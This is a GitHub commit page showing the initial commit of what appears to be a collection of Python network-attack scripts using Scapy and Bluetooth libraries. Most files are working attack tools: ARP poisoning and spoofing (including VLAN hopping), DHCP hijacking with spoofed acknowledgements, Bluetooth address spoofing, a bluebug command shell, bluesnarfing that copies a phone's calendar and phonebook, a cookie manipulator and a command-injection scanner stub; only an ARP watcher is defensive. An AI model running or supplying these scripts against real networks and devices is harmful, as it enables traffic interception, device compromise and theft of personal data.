Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 6714cef

Browse files
author
Bastian Ballmann
committed
init
0 parents  commit 6714cef

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

63 files changed

+2891
-0
lines changed

arp-poison.py

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
from scapy.all import sniff, sendp, ARP, Ether
5+
6+
7+
if len(sys.argv) < 2:
8+
print sys.argv[0] + " <iface>"
9+
sys.exit(0)
10+
11+
12+
def arp_poison_callback(packet):
13+
# Got ARP request?
14+
if packet[ARP].op == 1:
15+
answer = Ether(dst=packet[ARP].hwsrc) / ARP()
16+
answer[ARP].op = "is-at"
17+
answer[ARP].hwdst = packet[ARP].hwsrc
18+
answer[ARP].psrc = packet[ARP].pdst
19+
answer[ARP].pdst = packet[ARP].psrc
20+
21+
print "Fooling " + packet[ARP].psrc + " that " + \
22+
packet[ARP].pdst + " is me"
23+
24+
sendp(answer, iface=sys.argv[1])
25+
26+
sniff(prn=arp_poison_callback,
27+
filter="arp",
28+
iface=sys.argv[1],
29+
store=0)

arp-spoof-vlan-hop.py

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
#!/usr/bin/python
2+
3+
import time
4+
from scapy.all import sendp, ARP, Ether, Dot1Q
5+
6+
iface = "eth0"
7+
target_ip = '192.168.13.23'
8+
fake_ip = '192.168.13.5'
9+
fake_mac = 'c0:d3:de:ad:be:ef'
10+
our_vlan = 1
11+
target_vlan = 2
12+
13+
packet = Ether() / \
14+
Dot1Q(vlan=our_vlan) / \
15+
Dot1Q(vlan=target_vlan) / \
16+
ARP(hwsrc=fake_mac,
17+
pdst=target_ip,
18+
psrc=fake_ip,
19+
op="is-at")
20+
21+
while True:
22+
sendp(packet, iface=iface)
23+
time.sleep(10)

arp-spoof.py

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import time
5+
from scapy.all import sendp, ARP, Ether
6+
7+
if len(sys.argv) < 3:
8+
print sys.argv[0] + ": <target> <spoof_ip>"
9+
sys.exit(1)
10+
11+
iface = "eth0"
12+
target_ip = sys.argv[1]
13+
fake_ip = sys.argv[2]
14+
15+
ethernet = Ether()
16+
arp = ARP(pdst=target_ip,
17+
psrc=fake_ip,
18+
op="is-at")
19+
packet = ethernet / arp
20+
21+
while True:
22+
sendp(packet, iface=iface)
23+
time.sleep(10)

arp-watcher.py

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
#!/usr/bin/python
2+
3+
from scapy.all import sniff, ARP
4+
from signal import signal, SIGINT
5+
import sys
6+
7+
arp_watcher_db_file = "/var/cache/arp-watcher.db"
8+
ip_mac = {}
9+
10+
# Save ARP table on shutdown
11+
def sig_int_handler(signum, frame):
12+
print "Got SIGINT. Saving ARP database..."
13+
try:
14+
f = open(arp_watcher_db_file, "w")
15+
16+
for (ip, mac) in ip_mac.items():
17+
f.write(ip + " " + mac + "\n")
18+
19+
f.close()
20+
print "Done."
21+
except IOError:
22+
print "Cannot write file " + arp_watcher_db_file
23+
sys.exit(1)
24+
25+
26+
def watch_arp(pkt):
27+
# got is-at pkt (ARP response)
28+
if pkt[ARP].op == 2:
29+
print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
30+
31+
# Device is new. Remember it.
32+
if ip_mac.get(pkt[ARP].psrc) == None:
33+
print "Found new device " + \
34+
pkt[ARP].hwsrc + " " + \
35+
pkt[ARP].psrc
36+
ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
37+
38+
# Device is known but has a different IP
39+
elif ip_mac.get(pkt[ARP].psrc) and \
40+
ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
41+
print pkt[ARP].hwsrc + \
42+
" has got new ip " + \
43+
pkt[ARP].psrc + \
44+
" (old " + ip_mac[pkt[ARP].psrc] + ")"
45+
ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
46+
47+
48+
signal(SIGINT, sig_int_handler)
49+
50+
if len(sys.argv) < 2:
51+
print sys.argv[0] + " <iface>"
52+
sys.exit(0)
53+
54+
try:
55+
fh = open(arp_watcher_db_file, "r")
56+
except IOError:
57+
print "Cannot read file " + arp_watcher_db_file
58+
sys.exit(1)
59+
60+
for line in fh:
61+
line.chomp()
62+
(ip, mac) = line.split(" ")
63+
ip_mac[ip] = mac
64+
65+
sniff(prn=watch_arp,
66+
filter="arp",
67+
iface=sys.argv[1],
68+
store=0)

bdaddr.py

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,41 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import struct
5+
import bluetooth._bluetooth as bt
6+
7+
if len(sys.argv) < 2:
8+
print sys.argv[0] + " <bdaddr>"
9+
sys.exit(1)
10+
11+
# Split bluetooth address into it's bytes
12+
baddr = sys.argv[1].split(":")
13+
14+
# Open hci socket
15+
sock = bt.hci_open_dev(0)
16+
17+
# CSR vendor command to change address
18+
cmd = [ "\xc2", "\x02", "\x00", "\x0c", "\x00", "\x11",
19+
"\x47", "\x03", "\x70", "\x00", "\x00", "\x01",
20+
"\x00", "\x04", "\x00", "\x00", "\x00", "\x00",
21+
"\x00", "\x00", "\x00", "\x00", "\x00", "\x00",
22+
"\x00" ]
23+
24+
# Set new addr in hex
25+
cmd[17] = baddr[3].decode("hex")
26+
cmd[19] = baddr[5].decode("hex")
27+
cmd[20] = baddr[4].decode("hex")
28+
cmd[21] = baddr[2].decode("hex")
29+
cmd[23] = baddr[1].decode("hex")
30+
cmd[24] = baddr[0].decode("hex")
31+
32+
# Send HCI request
33+
bt.hci_send_req(sock,
34+
bt.OGF_VENDOR_CMD,
35+
0,
36+
bt.EVT_VENDOR,
37+
2000,
38+
"".join(cmd))
39+
40+
sock.close()
41+
print "Dont forget to reset your device"

bluebug.py

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import lightblue
5+
6+
if len(sys.argv) < 2:
7+
print sys.argv[0] + " <btaddr> <channel>"
8+
sys.exit(0)
9+
10+
btaddr = sys.argv[1]
11+
channel = int(sys.argv[2]) or 17
12+
running = True
13+
14+
sock = lightblue.socket()
15+
sock.connect((sys.argv[1], channel))
16+
17+
while running:
18+
cmd = raw_input(">>> ")
19+
20+
if cmd == "quit" or cmd == "exit":
21+
running = False
22+
else:
23+
sock.send(cmd)
24+
25+
sock.close()

bluesnarf.py

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
from os.path import basename
5+
from lightblue.obex import OBEXClient
6+
7+
8+
if len(sys.argv) < 3:
9+
print sys.argv[0] + ": <btaddr> <channel>"
10+
sys.exit(0)
11+
12+
btaddr = sys.argv[1]
13+
channel = int(sys.argv[2])
14+
15+
print "Bluesnarfing %s on channel %d" % (btaddr, channel)
16+
17+
obex = OBEXClient(btaddr, channel)
18+
obex.connect()
19+
20+
fh = file("calendar.vcs", "w+")
21+
obex.get({"name": "telecom/cal.vcs"}, fh)
22+
fh.close()
23+
24+
fh = file("phonebook.vcf", "w+")
25+
obex.get({"name": "telecom/pb.vcf"}, fh)
26+
fh.close()
27+
28+
obex.disconnect()

bluetooth-scanner.py

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
#!/usr/bin/python
2+
3+
import lightblue
4+
5+
for device in lightblue.finddevices():
6+
print device[0] + " " + device[1]

command-injection.py

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
#!/usr/bin/python
2+
3+
###[ Loading modules
4+
5+
import sys
6+
import httplib2
7+
from urlparse import urlparse
8+
from BeautifulSoup import BeautifulSoup
9+
10+
11+
###[ Global vars
12+
13+
max_urls = 999
14+
inject_chars = ["|",
15+
"&&",
16+
";",
17+
'`']
18+
error_msgs = [
19+
"syntax error",
20+
"command not found",
21+
"permission denied",
22+
]
23+
24+
# ...

cookie-manipulator.py

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import httplib2
5+
6+
if len(sys.argv) < 3:
7+
print sys.argv[0] + ": &lt;url&gt; <key> <value>"
8+
sys.exit(1)
9+
10+
webclient = httplib2.Http()
11+
headers = {'Cookie': sys.argv[2] + '=' + sys.argv[3]}
12+
response, content = webclient.request(sys.argv[1],
13+
'GET',
14+
headers=headers)
15+
print content

dhcp-hijack.py

Lines changed: 95 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
#!/usr/bin/python
2+
3+
import sys
4+
import getopt
5+
import random
6+
import scapy.all as scapy
7+
8+
dev = "eth0"
9+
gateway = None
10+
nameserver = None
11+
dhcpserver = None
12+
client_net = "192.168.1."
13+
filter = "udp port 67"
14+
15+
def handle_packet(packet):
16+
eth = packet.getlayer(scapy.Ether)
17+
ip = packet.getlayer(scapy.IP)
18+
udp = packet.getlayer(scapy.UDP)
19+
bootp = packet.getlayer(scapy.BOOTP)
20+
dhcp = packet.getlayer(scapy.DHCP)
21+
dhcp_message_type = None
22+
23+
if not dhcp:
24+
return False
25+
26+
for opt in dhcp.options:
27+
if opt[0] == "message-type":
28+
dhcp_message_type = opt[1]
29+
30+
# dhcp request
31+
if dhcp_message_type == 3:
32+
client_ip = client_net + str(random.randint(2,254))
33+
34+
dhcp_ack = scapy.Ether(src=eth.dst, dst=eth.src) / \
35+
scapy.IP(src=dhcpserver, dst=client_ip) / \
36+
scapy.UDP(sport=udp.dport,
37+
dport=udp.sport) / \
38+
scapy.BOOTP(op=2,
39+
chaddr=eth.dst,
40+
siaddr=gateway,
41+
yiaddr=client_ip,
42+
xid=bootp.xid) / \
43+
scapy.DHCP(options=[('message-type', 5),
44+
('requested_addr',
45+
client_ip),
46+
('subnet_mask',
47+
'255.255.255.0'),
48+
('router', gateway),
49+
('name_server',
50+
nameserver),
51+
('end')])
52+
53+
print "Send spoofed DHCP ACK to %s" % ip.src
54+
scapy.sendp(dhcp_ack, iface=dev)
55+
56+
57+
def usage():
58+
print sys.argv[0] + """
59+
-d <dns_ip>
60+
-g <gateway_ip>
61+
-i <dev>
62+
-s <dhcp_ip>"""
63+
sys.exit(1)
64+
65+
66+
try:
67+
cmd_opts = "d:g:i:s:"
68+
opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
69+
except getopt.GetoptError:
70+
usage()
71+
72+
for opt in opts:
73+
if opt[0] == "-i":
74+
dev = opt[1]
75+
elif opt[0] == "-g":
76+
gateway = opt[1]
77+
elif opt[0] == "-d":
78+
nameserver = opt[1]
79+
elif opt[0] == "-s":
80+
dhcpserver = opt[1]
81+
else:
82+
usage()
83+
84+
if not gateway:
85+
gateway = scapy.get_if_addr(dev)
86+
87+
if not nameserver:
88+
nameserver = gateway
89+
90+
if not dhcpserver:
91+
dhcpserver = gateway
92+
93+
print "Hijacking DHCP requests on %s" % (dev)
94+
scapy.sniff(iface=dev, filter=filter, prn=handle_packet)
95+

0 commit comments

Comments
 (0)